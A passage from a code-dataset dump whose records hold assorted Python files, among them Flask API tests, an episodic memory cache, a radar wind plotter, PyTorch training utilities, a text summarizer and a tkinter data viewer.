for i in range(len(im)):\n # for j in range(len(im[i])):\n # im[i][j] = int(255 * im[i][j] / max)\n # heatmap = np.zeros([w,h,4],dtype=np.uint8)\n heatmap = np.zeros((w,h),dtype=int)\n for i in trange(len(heatmap)):\n for j in range(len(heatmap[i])):\n d = im[int(i/step)][int(j/step)]\n # heatmap[i][j]=float(d)\n n = 0\n while(1):\n if d < (10 ** n):\n heatmap[i][j] = n - .5\n break\n n = n+.5\n # if im[int(i/step)][int(j/step)] == 0:\n # heatmap[i][j] = (255,255,255,0)\n for i in trange(len(heatmap)):\n for j in range(len(heatmap[i])):\n if im[int(i/step)][int(j/step)] > 0:\n heatmap[i][j] = heatmap[i][j] + 1\n return heatmap\n\n\nif __name__ == \"__main__\":\n map_path = '/home/sage/Desktop/ebola/'\n data_path = '/home/sage/Desktop/ebola/etu_1_condensed/'\n\n make_image(map_path,data_path)\n","sub_path":"old_files/place_mapper.py","file_name":"place_mapper.py","file_ext":"py","file_size_in_byte":2896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"307472119","text":"import PySimpleGUI as sg\r\nimport buyoption\r\nimport show_options\r\n\r\n\r\ndef buy(public_key, private_key):\r\n\r\n layout = [\r\n [sg.Text(\"Press VIEW to see available options\")],\r\n [sg.Button(\"VIEW\")],\r\n [sg.Text(\"Which option would you like to buy (enter N)\")],\r\n [sg.Input(key=\"NUMBER\")],\r\n [sg.Button(\"BUY\", bind_return_key=True), sg.Button(\"CANCEL\")],\r\n ]\r\n\r\n window = sg.Window(\"Buy Options\", layout)\r\n\r\n while True:\r\n event, values = window.read()\r\n print(event, values)\r\n if event == \"VIEW\":\r\n show_options.show()\r\n elif event == \"BUY\":\r\n buyoption.buy(int(values[\"NUMBER\"]), public_key, private_key)\r\n else:\r\n break\r\n\r\n window.close()\r\n","sub_path":"buy_gui.py","file_name":"buy_gui.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"612246431","text":"import os\n\nfrom flaskr import create_app\n\n\ndef test_config():\n # make sure passing test config works as expected\n assert not create_app().testing\n assert create_app({'TESTING': True}).testing\n\n\ndef test_hello(client):\n response = client.get('/hello')\n assert response.get_json() == {'message': 'Hello, World!'}\n\n\nclass TestGetSpecificBook(object):\n\n def test_get_book_success(self, client):\n response = client.get('/books/4').get_json()\n assert response[\"success\"]\n assert response['book'] == 
{'id': 4,\n 'title': 'Educated: A Memoir',\n 'author': 'Tara Westover',\n 'rating': 5}\n\n def test_get_book_failure(self, client):\n response = client.get('books/400').get_json()\n assert not response[\"success\"]\n assert response[\"error\"] == 404\n\n\nclass TestAddBook(object):\n\n def test_add_book_success(self, client):\n response = client.post('/books', json={'title': 'Bible',\n 'author': 'God',\n 'rating': 1}).get_json()\n assert response[\"success\"]\n\n def test_add_book_failure(self, client):\n response = client.post('/books', json={'random': 123}).get_json()\n assert not response[\"success\"]\n assert response[\"error\"] == 400\n\n\nclass TestSearchBook(object):\n\n def test_search_book_success(self, client):\n response = client.post('/books', json={'search': 'NOVEL'}).get_json()\n assert response[\"success\"]\n assert response[\"total_books\"] == 4\n","sub_path":"backend/tests/test_flaskr.py","file_name":"test_flaskr.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"3491888","text":"#### Episodic Memory Cache\n\n'''\nObject Classes and Relevant Functions for Episodic Memory Module\nAuthor: Annik Carson \n-- June 2018\n'''\n\n# =====================================\n# IMPORT MODULES #\n# =====================================\nfrom __future__ import division, print_function\nimport numpy as np\nimport time\nimport math # needed by sigmoid() below\nimport matplotlib.pyplot as plt # needed by plot_softmax() below\n\nclass ep_mem(object):\n\tdef __init__(self, model, cache_limit,**kwargs):\n\t\tself.cache_list \t\t= {}\t\t\t\t\t\t\t\t# memory bank object\n\t\tself.cache_limit \t\t= cache_limit # size of memory bank\n\t\tself.n_actions\t\t\t= model.layers[-1]\t\t\t\t\t# number of rows in each memory unit\n\n\t\tself.memory_envelope \t= kwargs.get('mem_envelope', 50) # speed of memory decay\n\n\t\t##\n\t\tself.mem_factor = 0.5\n\t\tself.reward_unseen = True\n\t\tself.time_since_last_reward= 0\n\t\tself.confidence_score = 0\n\t\tself.cs_max = 0\n\n\tdef reset_cache(self):\n\t\tself.cache_list.clear()\n\n\tdef add_mem(self, item):\n\t\tactivity \t= item['activity']\n\t\taction\t\t= item['action']\n\t\tdelta \t\t= item['delta']\n\t\ttimestamp\t= item['timestamp']\n\t\ttrial = item['trial']\n\t\t#\n\t\treadable = item['readable']\n\n\t\t# Case 1: memory is not full\n\t\tif len(self.cache_list) < self.cache_limit:\n\t\t\t# Case 1a: key does not yet exist\n\t\t\tif activity not in self.cache_list.keys(): # if no key for this state exists already, add new one\n\t\t\t\tmem_entry = np.empty((self.n_actions, 2))\n\t\t\t\tmem_entry[:,0] = np.nan # initialize deltas to nan\n\t\t\t\tmem_entry[:,1] = np.inf # initialize timestamps to inf\n\t\t\t\tself.cache_list[activity] = [mem_entry, np.inf, None]\n\t\t\t# Case 1b: key exists, add or replace relevant info in mem container\n\t\t\tself.cache_list[activity][0][action] = [delta, trial]\n\t\t\tself.cache_list[activity][1] = timestamp\n\t\t\tself.cache_list[activity][2] = readable\n\t\t# Case 2: memory is full\n\t\telse:\n\t\t\t# Case 2a: key does not yet exist\n\t\t\tif activity not in self.cache_list.keys():\n\t\t\t\t# choose key to be removed\n\t\t\t\tcache_keys = list(self.cache_list.keys())\n\t\t\t\tpersistence_ = [x[1] for x in self.cache_list.values()] # get list of all timestamp flags\n\t\t\t\tlp = persistence_.index(min(persistence_)) # find entry that was updated the LEAST recently\n\t\t\t\told_activity = cache_keys[lp] # get key in dictionary corresponding to oldest timestep flag\n\t\t\t\tdel self.cache_list[old_activity] # delete item from 
dictionary with oldest timestamp flag\n\n\t\t\t\t# add new mem container\n\t\t\t\tmem_entry = np.empty((self.n_actions, 2))\n\t\t\t\tmem_entry[:,0] = np.nan\n\t\t\t\tmem_entry[:,1] = np.inf # initialize entries to nan\n\t\t\t\tself.cache_list[activity] = [mem_entry, np.inf, None]\n\t\t\t# Case2b: key exists, add or replace relevant info in mem container\n\t\t\tself.cache_list[activity][0][action] = [delta, trial]\n\t\t\tself.cache_list[activity][1] = timestamp\n\t\t\tself.cache_list[activity][2] = readable\n\n\tdef recall_mem(self, key, timestep, **kwargs):\n\t\t'''\n\t\tpass in key: get most similar entry and return cosine sim score\n\n\t\tconfidence score = scaled by cosine sim\n\n\t\t'''\n\t\tself.mem_temp = kwargs.get('mem_temp', 0.1)\n\n\t\tif len(self.cache_list) == 0:\n\t\t\trandom_policy = softmax(np.zeros(self.n_actions))\n\t\t\treturn random_policy\n\t\telse:\n\t\t\t#specify decay envelope for memory relevance calculation\n\t\t\tenvelope = kwargs.get('decay', self.memory_envelope)\n\n\t\t\t# returns the most similar key, as well as the cosine similarity measure\n\t\t\tlin_act, similarity = self.cosine_sim(key)\n\t\t\tmemory = np.nan_to_num(self.cache_list[lin_act][0])\n\t\t\tdeltas = memory[:,0]\n\t\t\t#times = abs(timestep - memory[:,1])\n\t\t\t#pvals \t\t = self.make_pvals(times, envelope=envelope)\n\t\t\tpolicy = softmax( similarity*deltas, T=self.mem_temp) #np.multiply(sim,deltas))\n\n\t\t\treturn policy\n\n\n\tdef make_pvals(self, p, **kwargs):\n\t\tenvelope = kwargs.get('envelope', self.memory_envelope)\n\t\tif isinstance(p,int):\n\t\t\tratio = p/envelope\n\t\t\treturn np.round(1 / np.cosh(ratio), 8)\n\t\telse:\n\t\t\tratio = np.around(p/envelope, 8)\n\t\t\treturn np.round(1 / np.cosh(ratio), 8)\n\n\t# retrieve relevant items from memory\n\tdef cosine_sim(self, key):\n\t\t# make list of memory keys\n\t\tmem_cache = np.asarray(list(self.cache_list.keys()))\n\n\t\tentry = np.asarray(key)\n\t\t# compute cosine similarity measure\n\t\tmqt = np.dot(mem_cache, entry)\n\t\tnorm = np.linalg.norm(mem_cache, axis=1) * np.linalg.norm(entry)\n\t\tcosine_similarity = mqt / norm\n\n\t\tlin_act = mem_cache[np.argmax(cosine_similarity)]\n\t\treturn tuple(lin_act), max(cosine_similarity)\n\ndef sigmoid(x):\n\treturn 1 / (1 + math.exp(-x))\n\ndef softmax(x, T=1):\n\te_x = np.exp((x - np.max(x))/T)\n\treturn np.round(e_x / e_x.sum(axis=0),8) # only difference\n\ndef plot_softmax(x):\n\tf, axarr = plt.subplots(2, sharex=True)\n\taxarr[0].bar(np.arange(len(x)), x)\n\ty = softmax(x) \n\taxarr[1].bar(np.arange(len(x)), y) \n\tplt.show()\n\ndef calc_env(halfmax):\n\t'''\n\t:param halfmax: x value for which envelope will give sech(x/env) = 0.5\n\t:return: envelope value\n\te^(x/env) = (2+np.sqrt(3)) for sech(x/env) = 0.5\n\tHence x/env = np.log(2+np.sqrt(3)) and env = x/ np.log(2+np.sqrt(3))\n\t'''\n\treturn halfmax/np.log(2+np.sqrt(3))\n","sub_path":"memory/episodic.py","file_name":"episodic.py","file_ext":"py","file_size_in_byte":5073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"397395723","text":"Blue = 0\r\nRed = 0\r\nYellow = 0\r\nGreen = 0\r\nGold = 1\r\nHealth = 100\r\nExperience = 0\r\n\r\nif Gold == 1:\r\n print(\"The chest opens\")\r\n Health += 50\r\n Experience += 100\r\n \r\n\r\nelif Blue == 1:\r\n print(\"DEATH Appears\")\r\n Health -= 100\r\n\r\nelif Red == 1:\r\n print(\"The chest burns you\")\r\n Health -= 50\r\n\r\nelif Yellow == 1:\r\n print(\"A monster appears behind you\")\r\n\r\nelif Green == 1:\r\n print(\"A giant 
boulder falls from the ceiling and rolls toward you\")\r\n\r\n\r\nelse:\r\n print(\"You need a key to open this\")\r\n\r\nprint(\"Health:\", Health)\r\nprint(\"Experience:\", Experience)\r\n\r\nif Health <= 0:\r\n print(\"GAME OVER\")\r\nelse:\r\n print(\"\")\r\n","sub_path":"RPG.py","file_name":"RPG.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"237140559","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport datetime\nimport xarray\nimport datetime\nimport os\n\nfrom .config import get_plot_values\n\ndef quicklooks(file, config, image_directory=None):\n \"\"\"\n Quicklook, produces a single image using a VAD object netCDF file.\n \n Parameters\n ----------\n file : str\n File path to the VAD NetCDF file\n config : str\n A string of the radar name found from config.py that contains values\n for writing, specific to that radar\n \n Other Parameters\n ----------------\n image_directory : str\n File path to the image folder to save the VAD image. If no\n image file path is given, image path deafults to users home directory.\n \n \"\"\"\n if image_directory is None:\n image_directory = os.path.expanduser('~')\n plot_values = get_plot_values(config)\n vad = xarray.open_dataset(file)\n \n u = vad.u_wind.data[::6,::5]/0.514444\n v = vad.v_wind.data[::6,::5]/0.514444\n z = vad.height.data[::5]/1000\n C = vad.speed.data[::6,::5]/0.514444\n t = vad.time[::6].data\n date = pd.to_datetime(vad.time[0].data).strftime('%Y%m%d')\n ts = datetime.datetime.strptime(date, '%Y%m%d')\n \n \n fig = plt.figure(figsize=[25,12])\n font = {'family': 'normal',\n 'size': 20}\n matplotlib.rc('font', **font)\n matplotlib.rcParams.update({'font.size': 20})\n matplotlib.rcParams.update({'axes.titlesize': 20})\n \n for i in range(len(t)):\n Xq, Yq = np.meshgrid(t[i], z)\n img = plt.barbs(Xq[:,0], Yq[:,0], u[i], v[i],\n C[i], cmap = plot_values['cmap'],\n norm=plot_values['norm'],\n sizes=dict(emptybarb=0.1), rounding=False,\n length=7, clip_on=False)\n\n cb = plt.colorbar(img, cmap=plot_values['cmap'], norm=plot_values['norm'],\n boundaries=plot_values['ticks'], ticks=plot_values['ticks'])\n cb.set_label('Speed (kts)')\n plt.title(plot_values['title'] + str(ts) + ' - '\n + str(ts + datetime.timedelta(days=1)))\n plt.xlim(ts, (ts + datetime.timedelta(days=1)))\n plt.xticks(rotation=45)\n plt.ylim(0,10)\n plt.ylabel('Height (km)')\n plt.xlabel('Time (UTC)')\n \n plt.savefig(image_directory + '/' + plot_values['save_name']\n + '.' 
+ str(date) + '.000000.png', bbox_inches='tight') \n \n \n ","sub_path":"vad/vad_quicklooks.py","file_name":"vad_quicklooks.py","file_ext":"py","file_size_in_byte":2454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"41878130","text":"from __future__ import print_function\n\nimport torch\nimport numpy as np\n\n\nimport sys\n\ndef info(type, value, tb):\n if hasattr(sys, 'ps1') or not sys.stderr.isatty():\n # we are in interactive mode or we don't have a tty-like\n # device, so we call the default hook\n sys.__excepthook__(type, value, tb)\n else:\n import traceback, pdb\n # we are NOT in interactive mode, print the exception...\n traceback.print_exception(type, value, tb)\n print() # with print_function imported, a bare 'print' would be a no-op\n # ...then start the debugger in post-mortem mode.\n # pdb.pm() # deprecated\n pdb.post_mortem(tb) # more \"modern\"\n\nsys.excepthook = info\n\ndef adjust_learning_rate(epoch, opt, optimizer):\n \"\"\"Sets the learning rate to the initial LR decayed by 0.2 every steep step\"\"\"\n steps = np.sum(epoch > np.asarray(opt.lr_decay_epochs))\n if steps > 0:\n new_lr = opt.learning_rate * (opt.lr_decay_rate ** steps)\n for param_group in optimizer.param_groups:\n param_group['lr'] = new_lr\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n def __init__(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n\ndef accuracy(output, target, topk=(1,)):\n \"\"\"Computes the accuracy over the k top predictions for the specified values of k\"\"\"\n with torch.no_grad():\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\n\nif __name__ == '__main__':\n meter = AverageMeter()\n\n\nfrom sklearn.decomposition import PCA\n\nimport visdom\nimport time\nimport PIL\nimport torchvision\nimport skimage\n\n\ndef pca_viz(f, K=10, solver='auto', img_normalize=True):\n ## expect f to be N x D\n \n pca = PCA(\n n_components=K,\n svd_solver=solver,\n whiten=False\n )\n p_f = pca.fit_transform(f)\n\n import pdb; pdb.set_trace()","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"382971477","text":"\"\"\"Convert collector issue instances transcripts to WebTextDocument.\n\nThis is only necessary if you used a pre-1.0 version of the collector. If you\ndid, create an external method in your portal root:\n\n o id: collector_webtext_migration\n\n o title (optional): Upgrade collector issues (temporary)\n\n o module name: CMFCollector.webtext_migration.py\n\n o function name: collector_webtext_migration\n\nFor each collector, visit the URL constructed of the URL for the\ncollector plus '/collector_webtext_migration'. 
This will run the method on\nthe collector, producing a (sparse) page reporting the changes, or that no\nchanges were necessary.\n\nThe process may take a while, if your site catalogs a lot of objects - the\nconverted issues are (necessarily) reindexed, internally and in the site\ncatalog.\n\nYou can delete the external method once you've upgraded your preexisting\nissues - it won't be needed after that.\"\"\"\n\nMIGRATE_ATTRIBUTES = ['effective_date',\n 'expiration_date',\n '_isDiscussable',\n '_stx_level', # even though we don't use it\n '_last_safety_belt_editor',\n '_last_safety_belt',\n '_safety_belt',\n ]\n\nfrom Products.CMFCollector.WebTextDocument import WebTextDocument\nfrom Products.CMFCollector.CollectorIssue import RULE\nimport re\n\ntidypre = re.compile(\"\\n</?pre collector:deleteme>\\n\").sub\ntidyleadspace = re.compile(\"\\n ([^ ])\").sub\n\ndef collector_webtext_migration(self):\n \"\"\"Migrate old CMF \"Document\" based transcripts to \"WebTextDocument\".\"\"\"\n total_changed = 0\n issues = self.objectValues(spec=\"CMF Collector Issue\")\n for issue in issues:\n transcript = issue.get_transcript()\n was_p_mtime = transcript._p_mtime\n was_creation_date = transcript.creation_date\n changed = 0\n if transcript.meta_type != \"WebText Document\":\n changed = 1\n webtext = WebTextDocument(transcript.id,\n title=transcript.title,\n description=transcript.description,\n text=transcript.text)\n for attr in MIGRATE_ATTRIBUTES:\n if hasattr(transcript, attr):\n setattr(webtext, attr, getattr(transcript, attr))\n issue._delObject(transcript.id)\n issue._setObject(webtext.id, webtext)\n transcript = getattr(issue, webtext.id)\n if changed or transcript.text_format != 'webtext':\n total_changed += 1\n transcript.text_format = 'webtext'\n transcript.cooked_text = ''\n text = tidypre('\\n', transcript.text)\n text = tidyleadspace('\\n\\\\1', transcript.text)\n text = text.replace('\\n<hr>\\n', '\\n' + RULE + '\\n')\n \n transcript.text = text # Ditch garbage\n transcript._edit('webtext', text) # Cook the text.\n transcript._p_mtime = was_p_mtime\n transcript.creation_date = was_creation_date\n transcript.meta_type = \"Collector Issue Transcript\"\n if total_changed:\n self.reinstate_catalog()\n return (\"Converted %d of %d issues, and reinstated catalog\"\n % (total_changed, len(issues)))\n else:\n return (\"No changes, all issues are current.\")\n","sub_path":"CMF/tags/ExtensionsBase/CMFCollector/Extensions/webtext_migration.py","file_name":"webtext_migration.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"517635925","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport gzip, pickle\n\ndef load_data(fn):\n with gzip.open(fn) as f:\n d = pickle.load(f)\n return d\n\ndef save_data(d, fn):\n with gzip.open(fn, \"w\") as f:\n pickle.dump(d, f)\n\n\n# In[2]:\n\n\nG_f_src = \"TEST.pkl.gz\"\nG_f_tar = \"AE1_in.pkl.gz\"\n\n\n# In[3]:\n\n\nG_hist_raw = load_data(G_f_src)\nprint(len(G_hist_raw))\n\n\n# In[4]:\n\n\nfrom scipy import stats\nimport numpy as np\n\ndef x_ae_col_1(col_1):\n \n l = len(col_1)\n \n #get ratio\n col_new = list()\n for i in range(l-1):\n x1 = col_1[i]\n x2 = col_1[i+1]\n\n r = (x2*1.0)/(x1+x2)\n if (r != r):\n r = 0.5\n col_new.append(r)\n\n return stats.zscore(col_new)\n\n\ndef x_ae_1(hist_1):\n \n if (len(hist_1)<26):\n return list()\n \n # column-wise processing r=(today/(today+yesterday))\n norm = list()\n for col in hist_1.columns:\n 
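# each appended series is z-scored by x_ae_col_1 (see above)\n 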
norm.append(x_ae_col_1(hist_1[col]))\n\n norm_T = np.transpose(norm)\n\n # flatten 20 lines\n l = len(norm_T)\n x_1 = list()\n for i in range(l-24):\n x_1.append(norm_T[i:i+20].flatten())\n \n return x_1\n\n\ndef k_ae_1(c, hist_1):\n return [(c, i) for i in hist_1.index[20:-5] ]\n\n\ndef y_ae_1(hist_1):\n y_1 = list()\n y_raw = hist_1[\"Adj Close\"]\n l = len(y_raw)\n for i in range(l-25):\n y_new = y_raw[i+24] / (y_raw[i+24] + y_raw[i+20])\n if (y_new != y_new):\n y_new = 0\n else:\n y_new = int((y_new-0.52)/100.0+1.0) # 1 if y_new>0.52\n \n y_1.append(y_new)\n \n return y_1\n\n\n\ndef kxy_ae(hist_all):\n \n #check blank\n max_len = 0\n for c in hist_all.keys():\n k_1 = k_ae_1(c, hist_all[c])\n if (max_len < len(k_1)):\n max_len = len(k_1)\n \n x_all, y_all, k_all = list(), list(), list()\n for c in hist_all.keys():\n k_1 = k_ae_1(c, hist_all[c])\n if (max_len == len(k_1)):\n k_all.extend(k_1)\n x_all.extend(x_ae_1(hist_all[c]))\n y_all.extend(y_ae_1(hist_all[c]))\n\n return (k_all, x_all, y_all)\n\n\n# In[5]:\n\n\nG_data_ae = kxy_ae(G_hist_raw)\n\n\n# In[ ]:\n\n\nprint(len(G_data_ae[0]), len(G_data_ae[1]), len(G_data_ae[2]))\nprint(sum(G_data_ae[2])/len(G_data_ae[2]))\n\n\n# In[ ]:\n\n\nsave_data(G_data_ae, G_f_tar)\n\n","sub_path":"testing/AE_1st_prep.py","file_name":"AE_1st_prep.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"612228673","text":"from typing import Union, List, Callable\nfrom settings import GOTHIC_FONT_PATH, GOTHIC_BOLD_FONT_PATH\n\nfrom rest_framework.serializers import ModelSerializer\n\nfrom reportlab.lib import colors\nfrom reportlab.lib.units import mm\nfrom reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle\nfrom reportlab.lib.enums import TA_RIGHT, TA_CENTER\n\nfrom reportlab.pdfbase.ttfonts import TTFont\nfrom reportlab.pdfbase import pdfmetrics\nfrom reportlab.platypus import Table, Paragraph, TableStyle\n\n\nMARGINS = { 'top': 10*mm, 'bottom': 10*mm, 'right': 7*mm, 'left': 7*mm }\n\nGRIS_CLARO = 0xE0E0E0\nGRIS_OSCURO = 0xBDBBBC\n\ndef setUpStyles():\n styles = getSampleStyleSheet()\n\n styles.add(ParagraphStyle(name='Right', alignment=TA_RIGHT, fontSize=12, parent=styles['Normal']))\n styles.add(ParagraphStyle(name='Center', alignment=TA_CENTER, fontSize=12, parent=styles['Normal']))\n\n try: # En caso de que no exista el archivo de las fuentes\n pdfmetrics.registerFont(TTFont('Gothic', GOTHIC_FONT_PATH))\n pdfmetrics.registerFont(TTFont('Gothic-Bold', GOTHIC_BOLD_FONT_PATH))\n\n styles['Normal'].fontName='Gothic'\n styles['Normal'].fontSize=8\n styles['Heading3'].fontName='Gothic-Bold'\n styles['Heading3'].fontSize = 12\n\n except Exception:\n pass\n\n return styles\n\nstyles = setUpStyles()\n\ndef paragraph(text: Union[str, int], estilo: str = 'Normal') -> Paragraph:\n return Paragraph(text, styles[estilo])\n\nENTER = paragraph(\"<br/><br/>\")\n\ndef pdf_tabla(lines: ModelSerializer, colWidths, table_header: Callable, table_body: Callable) -> List[Table]:\n table_style = TableStyle(\n [('BACKGROUND', (0, 0), (-1, 0), colors.HexColor(GRIS_OSCURO))] + # La fila con los nombres de las columnas esta con fondo gris oscuro\n [('BACKGROUND', (0, i), (-1, i), colors.HexColor(GRIS_CLARO)) # Las filas pares tienen fondo gris claro\n for i in range(2, len(lines) + 1, 2)]\n )\n\n return [Table(\n table_header() + table_body(lines),\n colWidths=colWidths,\n style=table_style,\n 
)]\n","sub_path":"common/imprimir.py","file_name":"imprimir.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"11380177","text":"from nltk.tokenize import sent_tokenize, word_tokenize\r\nfrom nltk.corpus import stopwords\r\nfrom string import punctuation\r\n\r\ntext,sents,words = None, None, None\r\n\r\narticleUrl = r'https://www.washingtonpost.com/news/the-switch/wp/2016/10/18/the-pentagons-massive-new-telescope-is-designed-to-track-space-junk-and-watch-out-for-killer-asteroids/?utm_term=.edab3111d8dc'\r\n \r\n\r\nimport urllib.request as ul\r\nfrom bs4 import BeautifulSoup as bs\r\n\r\ndef getArticle(url=None):\r\n #articleUrl = r'https://www.washingtonpost.com/news/the-switch/wp/2016/10/18/the-pentagons-massive-new-telescope-is-designed-to-track-space-junk-and-watch-out-for-killer-asteroids/?utm_term=.edab3111d8dc'\r\n if url!=None:\r\n articleUrl = url\r\n page = ul.urlopen(articleUrl).read().decode('utf8','ignore')\r\n soup = bs(page,'html.parser')\r\n text = ' '.join(map(lambda p: p.text,soup.find_all('article')))\r\n #text = open('Pentagon1.txt','r').read()\r\n return text\r\n\r\ndef preProcess(text):\r\n #text = open('Pentagon1.txt','r').read()\r\n sents = sent_tokenize(text)\r\n #print(sents)\r\n\r\n word_sent = word_tokenize(text.lower())\r\n #print(word_sent)\r\n\r\n customStopWords = set(stopwords.words('english')+ list(punctuation))\r\n #print(customStopWords)\r\n\r\n wordsWOStopWords = [x for x in word_sent if x not in customStopWords]\r\n #print(wordsWOStopWords)\r\n\r\n return (wordsWOStopWords,sents)\r\n\r\n\r\n\r\n\r\nfrom nltk.probability import FreqDist\r\nfrom heapq import nlargest\r\n\r\ndef ImportanceLogic(words):\r\n #words,sents = ppreProcess()\r\n #print(words)\r\n freq = FreqDist(words)\r\n #print(dict(freq))\r\n #get top 10 important words\r\n ImportantWords = (nlargest(10,freq,key=freq.get))\r\n return freq,ImportantWords\r\n\r\nfrom collections import defaultdict\r\n\r\n\r\ndef Summarize(text,n):\r\n words,sents = preProcess(text)\r\n assert n<=len(sents)\r\n \r\n freq,ImportantWords = ImportanceLogic(words)\r\n\r\n #print(freq)\r\n ranking = defaultdict(int)\r\n #print(sents)\r\n for i,sent in enumerate(sents):\r\n for w in word_tokenize(sent.lower()):\r\n if w in freq:\r\n #print(sent,w,freq)\r\n ranking[i] += freq[w]\r\n #print(ranking)\r\n sents_idx = nlargest(4,ranking,key=ranking.get)\r\n #print(sents_idx)\r\n sorted_sents_idx = [sents[j] for j in sorted(sents_idx)]\r\n #print(sorted_sents_idx)\r\n return sorted_sents_idx\r\n\r\nimport sys\r\n\r\ndef main():\r\n #for x in sys.argv:\r\n # print(x)\r\n '''\r\n if len(sys.argv)!=2: #if command prompt two\r\n print(\"Usage: python Summarizing.py url\")\r\n sys.exit(1)\r\n else:\r\n url = sys.argv[1]\r\n #print(url)\r\n '''\r\n print(\"=\"*136)\r\n #for x in (Summarize(getArticle(url),3)):\r\n text = open('output.txt','r').read()\r\n for x in (Summarize(text,5)):\r\n print(x)\r\n print(\"=\"*136)\r\n \r\nif __name__ == '__main__':\r\n main()\r\n\r\n","sub_path":"Natural Language Processing/Medium Level NLP/Summarizing.py","file_name":"Summarizing.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"368437715","text":"from infra import api\nfrom infra.errors import api_error\n\nclass api_test():\n\n failCnt = 0\n failTst = []\n\n ###################################################\n def empty_ticker(self):\n 
print(\"...Testing empty ticker\") \n try:\n api.get_pd_df()\n except api_error as e:\n if e.msg != 'ticker not specified':\n self.failCnt += 1\n self.failTst.append('empty_ticker')\n\n ###################################################\n def ticker_default_period(self, ticker):\n print(\"...Testing get_pd_df for ticker {} with default period\".format(ticker.upper()))\n df = api.get_pd_df(ticker)\n print(df)\n\n ###################################################\n def plot_ticker(self, ticker):\n print(\"...Testing plot ticker {} adjusted close for 1 year\".format(ticker.upper()))\n df = api.get_pd_df(ticker, 'today', '-365')\n techInd = {\"SMA\": [10,50]}\n api.plot_chart(df['Adj Close'].sort_index(), '1 Year SPY', techInd=techInd)\n\n ###################################################\n def start_test(self):\n print(\"Starting api_test\")\n self.empty_ticker()\n self.ticker_default_period('spy')\n self.plot_ticker('spy')\n\n def summary(self):\n print(\"Summary:\")\n print(\" failCnt = {}\".format(self.failCnt))\n print(\" failTst = {}\".format(self.failTst))\n","sub_path":"tests/api_test.py","file_name":"api_test.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"90558355","text":"from tkinter import ttk\nimport tkinter\nimport json\nimport sqlite3\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg\nfrom matplotlib.figure import Figure\nfrom scipy import stats\nfrom scipy.stats import zscore\nimport math\nimport numpy\n\nclass mainWindow():\n\n finalVals = {}\n\n def __init__(self):\n self.__root = tkinter.Tk()\n self.__root.withdraw()\n self.createWindow()\n self.__root.mainloop()\n\n #Closes all windows\n def Exit(self):\n self.__root.quit()\n\n #Creates the Toplevel window on start\n def createWindow(self):\n self.__Window = tkinter.Toplevel()\n self.__Window.minsize(width = 200,height = 200)\n\n self.__QuitButton = tkinter.Button(self.__Window,text=\"Quit\",command=self.Exit)\n self.__QuitButton.grid(row=0,column=0)\n\n self.__WindowLabel = tkinter.Label(self.__Window)\n self.__WindowLabel.grid(row=1,column=0)\n self.__LabelCount = [0]\n\n self.__WindowFrame = tkinter.Frame(self.__Window)\n self.__WindowFrame.grid(row=3,column=0)\n\n self.__CrimeList = self.fetchNames()\n self.__WindowLabel[\"text\"] = self.__CrimeList[self.__LabelCount[0]]\n\n self.__crimeTree = tkinter.ttk.Treeview(self.__Window, columns = (\"1\"))\n self.__crimeTree.grid(row=2,column=0)\n self.__crimeTree.heading('#0',text=\"Area\")\n self.__crimeTree.heading('#1',text=\"Incidents\")\n self.__crimeTree.column('#1',stretch=tkinter.YES)\n self.__crimeTree.column('#0',stretch=tkinter.YES)\n \n self.__NextLabelButton = tkinter.Button(self.__WindowFrame,text=\"Next\",command=lambda :[self.nextList(self.__LabelCount),\n self.UpdateList(self.__WindowLabel,\n self.__CrimeList,\n self.__LabelCount)])\n self.__NextLabelButton.grid(row=0,column=1)\n self.__PrevLabelButton = tkinter.Button(self.__WindowFrame,text=\"Previous\",command=lambda :[self.prevList(self.__LabelCount),\n self.UpdateList(self.__WindowLabel,\n self.__CrimeList,\n self.__LabelCount)])\n self.__PrevLabelButton.grid(row=0,column=0)\n\n self.__graphButton = tkinter.Button(self.__WindowFrame,text=\"Plot Graph\",command=self.plotGraph)\n self.__graphButton.grid(row=0,column=2)\n\n self.__GraphCan = 